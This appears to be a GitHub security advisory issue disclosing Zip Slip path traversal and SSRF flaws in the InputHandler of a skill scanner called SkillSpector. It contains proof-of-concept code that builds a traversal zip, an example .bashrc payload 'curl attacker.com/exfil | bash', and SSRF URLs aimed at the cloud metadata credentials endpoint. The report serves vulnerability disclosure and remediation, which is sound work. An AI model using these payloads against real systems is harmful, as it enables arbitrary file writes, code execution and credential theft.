[Security] Zip Slip path traversal and SSRF via permissive Git URL validation in InputHandler

## Summary

Imagine a post office that opens every parcel to inspect it for safety, but the inspection room has no blast containment — so a parcel *designed to explode on opening* detonates in the very facility meant to keep everyone safe. That's the paradox here: SkillSpector is a security scanner that is itself vulnerable to the attacks it should be detecting.

Two separate vulnerabilities exist in the `InputHandler`:

1. **Zip Slip (Path Traversal)**: When processing `.zip` skill archives, `_extract_zip()` calls `zipfile.extractall()` without validating that extracted paths stay within the target directory. A malicious zip can write files anywhere on the filesystem.

2. **SSRF (Server-Side Request Forgery)**: The `_is_git_url()` validation uses substring matching (`if any(host in parsed.netloc for host in git_hosts)`) and accepts any URL ending in `.git`. This allows an attacker to trick SkillSpector into making requests to internal network endpoints, cloud metadata services, or arbitrary hosts.

## Relation to Existing Issues

- **Zip Slip** was independently reported in #109 by @HetCreep, with a fix proposed in PR #116 (using Python 3.12 `filter="data"`). That PR remains unmerged.
- **SSRF via `_is_git_url()`** is a separate, previously unreported vulnerability in the same component. It is not covered by #109, #116, #21, or #62 (which is about *detecting* SSRF in scanned skills, not SSRF in SkillSpector itself).
- #21 by @wernerkasselman-au covers resource exhaustion in the ingest layer (unbounded downloads, zip bombs) but not path traversal or SSRF.

This issue consolidates both under one coherent attack surface analysis of `InputHandler`, as they share the same root cause: **the ingest layer processes attacker-controlled input without validation**.

## Why This Matters — Real-World Scenario

**Scenario 1: Zip Slip in a CI/CD scanning pipeline**

A company runs SkillSpector in their CI pipeline to vet community-submitted skills before publishing to an internal registry. The scanner runs as a GitHub Action on a shared runner.

A malicious contributor submits a skill as a `.zip` archive. Inside, the zip contains:
```
SKILL.md                                   (looks normal)
../../../home/runner/.bashrc               (payload: curl attacker.com/exfil | bash)
```

The CI pipeline downloads and scans the zip. SkillSpector's `_extract_zip()` unpacks it, writing to `../../../home/runner/.bashrc`. The next time any job runs on that runner, the injected script exfiltrates secrets and source code.

**Scenario 2: SSRF via Git URL on a cloud instance**

The same pipeline accepts Git URLs for scanning. An attacker submits:
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name.git
```

SkillSpector validates this URL: `169.254.169.254` is not in the default `git_hosts` list, but the URL ends in `.git`, and the fallback path accepts it. The scanner's host (an EC2 instance) issues a `git clone` to the metadata endpoint. Even though the clone fails, the HTTP request reaches the metadata service — and in some configurations, the error output or network logs expose IAM credentials.

In both cases, the security scanner itself becomes the attack vector.

## Reproduction

### Zip Slip

```python
import zipfile, io, os, tempfile

# Create malicious zip
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
    zf.writestr("SKILL.md", "---\nname: test\n---\n# Normal")
    zf.writestr("../../etc/pwned.txt", "you have been pwned")
buf.seek(0)

# Save and scan
with open("/tmp/evil-skill.zip", "wb") as f:
    f.write(buf.read())
```

```bash
skillspector scan /tmp/evil-skill.zip --no-llm
# Check if /tmp/etc/pwned.txt was created outside the temp extract dir
ls -la /tmp/etc/pwned.txt  # Should NOT exist, but it does
```

### SSRF

```bash
# Point to an internal HTTP service (simulated)
skillspector scan "http://169.254.169.254/latest/meta-data.git" --no-llm
# Observe: git clone attempt is made to the metadata endpoint
# Even on failure, the HTTP request reaches the target
```

## Root Cause

### Zip Slip — `src/skillspector/input_handler.py` lines 181-182:

```python
def _extract_zip(self, zip_path: Path) -> Path:
    extract_dir = Path(tempfile.mkdtemp())
    with zipfile.ZipFile(zip_path, "r") as zf:
        zf.extractall(extract_dir)  # No path traversal check!
    return extract_dir
```

Python's `zipfile.extractall()` does not prevent path traversal — it extracts entries with `../` prefixes to locations outside the target directory. The fix is to validate each entry's resolved path stays within `extract_dir` before extraction.

### SSRF — `src/skillspector/input_handler.py` lines 105-117:

```python
def _is_git_url(self, input_str: str) -> bool:
    git_hosts = ["github.com", "gitlab.com", "bitbucket.org"]
    parsed = urlparse(input_str)
    if parsed.scheme in ("http", "https", "git", "ssh"):
        if any(host in parsed.netloc for host in git_hosts):  # Substring match!
            return True
        if input_str.endswith(".git"):
            return True  # Any URL ending in .git is accepted
    return False
```

Two problems:
1. **Substring matching**: `"github.com" in "evil-github.com"` is `True` — an attacker-controlled domain `evil-github.com` passes validation
2. **`.git` suffix fallback**: Any URL ending in `.git` is accepted regardless of host, allowing internal network targets with a `.git` suffix

The `_clone_git()` method (lines 125-148) then runs `git clone` without `--depth 1` safety flags or environment variables like `GIT_TERMINAL_PROMPT=0` and `GIT_ASKPASS=/bin/true` to prevent credential leakage.

## Impact

- **Zip Slip**: Arbitrary file write on the host filesystem — can overwrite configuration files, inject backdoors into CI runners, or corrupt system files
- **SSRF**: Network requests to internal services, cloud metadata endpoints (169.254.169.254), or arbitrary external hosts from the scanner's network position
- **Privilege escalation path**: Zip Slip + CI runner = code execution as the CI service account
- **Supply chain risk**: A scanner vulnerability means the security gate itself is compromised — all skills passing through it are at risk
- **Trust violation**: Security tools are granted elevated access precisely because they're trusted; a vulnerability here has outsized blast radius

## Affected Version

SkillSpector v2.2.3

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] Zip Slip path traversal and SSRF via permissive Git URL validation in InputHandler #147

Summary

Relation to Existing Issues

Why This Matters — Real-World Scenario

Reproduction

Zip Slip

SSRF

Root Cause

Zip Slip — `src/skillspector/input_handler.py` lines 181-182:

SSRF — `src/skillspector/input_handler.py` lines 105-117:

Impact

Affected Version

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

[Security] Zip Slip path traversal and SSRF via permissive Git URL validation in InputHandler #147

Description

Summary

Relation to Existing Issues

Why This Matters — Real-World Scenario

Reproduction

Zip Slip

SSRF

Root Cause

Zip Slip — src/skillspector/input_handler.py lines 181-182:

SSRF — src/skillspector/input_handler.py lines 105-117:

Impact

Affected Version

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions

Zip Slip — `src/skillspector/input_handler.py` lines 181-182:

SSRF — `src/skillspector/input_handler.py` lines 105-117: